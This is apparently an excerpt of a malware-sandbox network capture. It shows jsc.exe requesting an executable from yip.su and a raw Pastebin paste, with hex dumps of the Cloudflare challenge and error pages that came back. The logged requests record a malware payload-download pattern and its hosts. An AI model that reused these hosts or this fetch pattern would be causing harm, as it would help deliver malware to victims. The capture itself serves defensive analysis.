                                    2024-08-17 22:10:19 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:19 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:19 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:19 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    47192.168.2.549773188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:19 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:19 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:19 UTC687INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 79 64 4f 47 56 64 6d 33 4c 77 73 6f 6a 33 4d 35 34 53 67 36 5a 7a 6f 36 50 78 64 44 59 6e 4e 45 6e 79 65 77 2b 30 74 4d 70 31 62 41 77 4b 37 59 6c 67 64 6c 57 2f 33 4e 6c 76 76 32 65 53 54 53 54 70 56 4a 77 77 77 6d 74 55 30 46 34 52 79 67 55 4b 46 6b 37 71 35 34 34 46 4a 54 2b 46 32 35 33 6d 63 65 79 7a 63 4f 56 62 73 3d 24 74 35 44 6f 76 53 4f 59 66 4c 77 41 6c 68 6e 53 6e 55 59 2b 61 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: ydOGVdm3Lwsoj3M54Sg6Zzo6PxdDYnNEnyew+0tMp1bAwK7YlgdlW/3Nlvv2eSTSTpVJwwwmtU0F4RygUKFk7q544FJT+F253mceyzcOVbs=$t5DovSOYfLwAlhnSnUY+aA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:19 UTC1369INData Raw: 33 65 32 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e27<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:19 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:19 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:19 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:19 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:19 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:19 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:19 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 33 39 39 31 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 35 39 33 65 64 61 31 39 30 65 27 2c 63 48 61 73 68 3a 20 27 64 31 65 35 32 35 34 30 61 61 31 62 31 65 62 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 64 39 76 31 6e 68 36 4e 43 6c 74 37 50 39 77 6e 6c 69 50 50 59 4c 57 7a 79 6e 2e 4e 50 65 49 79 39 36 31 47 5f 4d 6a 36 70 71 45 2d 31 37 32 33 39 33 32 36 31 39 2d 30 2e 30 2e 31 2e 31 2d 34 31 38 30 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '63991',cRay: '8b4cfe593eda190e',cHash: 'd1e52540aa1b1eb',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=d9v1nh6NClt7P9wnliPPYLWzyn.NPeIy961G_Mj6pqE-1723932619-0.0.1.1-4180",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:19 UTC1369INData Raw: 35 61 55 36 51 4a 2e 62 6c 65 47 67 5f 44 32 6c 79 77 32 45 34 6c 37 33 5f 57 72 47 64 33 46 70 4c 6a 76 63 77 41 42 70 6f 43 5f 33 4e 67 4d 5a 61 63 53 79 5f 32 6e 4c 71 4e 78 58 43 36 61 72 62 67 30 79 6c 75 7a 53 70 4a 4b 42 2e 6b 36 74 61 74 51 49 79 4a 33 38 4f 30 6e 38 43 41 66 32 66 50 49 36 63 77 4b 5f 33 4c 51 55 63 69 61 38 47 64 65 33 78 41 64 48 39 70 63 35 37 74 47 37 47 6e 77 6c 75 6e 4f 41 6c 36 48 50 43 75 59 65 65 68 49 67 41 6a 59 53 74 35 73 73 4b 6b 70 76 78 63 2e 4e 6e 6c 44 32 55 4b 53 64 61 64 52 31 37 6d 69 7a 56 45 49 6e 6f 31 2e 63 4b 35 30 62 4d 66 4f 6b 51 78 6d 6d 31 45 72 44 47 52 54 78 31 44 63 79 7a 4b 51 7a 69 54 54 52 52 4a 6a 64 5f 31 69 68 39 75 57 35 69 6d 48 4d 74 67 54 5f 51 54 5a 47 54 73 46 59 62 7a 4f 4b 32 46 77
                                    Data Ascii: 5aU6QJ.bleGg_D2lyw2E4l73_WrGd3FpLjvcwABpoC_3NgMZacSy_2nLqNxXC6arbg0yluzSpJKB.k6tatQIyJ38O0n8CAf2fPI6cwK_3LQUcia8Gde3xAdH9pc57tG7GnwlunOAl6HPCuYeehIgAjYSt5ssKkpvxc.NnlD2UKSdadR17mizVEIno1.cK50bMfOkQxmm1ErDGRTx1DcyzKQziTTRRJjd_1ih9uW5imHMtgT_QTZGTsFYbzOK2Fw


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    48192.168.2.549774104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:24 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:24 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfe798c2e8ce8-EWR
                                    2024-08-17 22:10:24 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:24 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:24 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
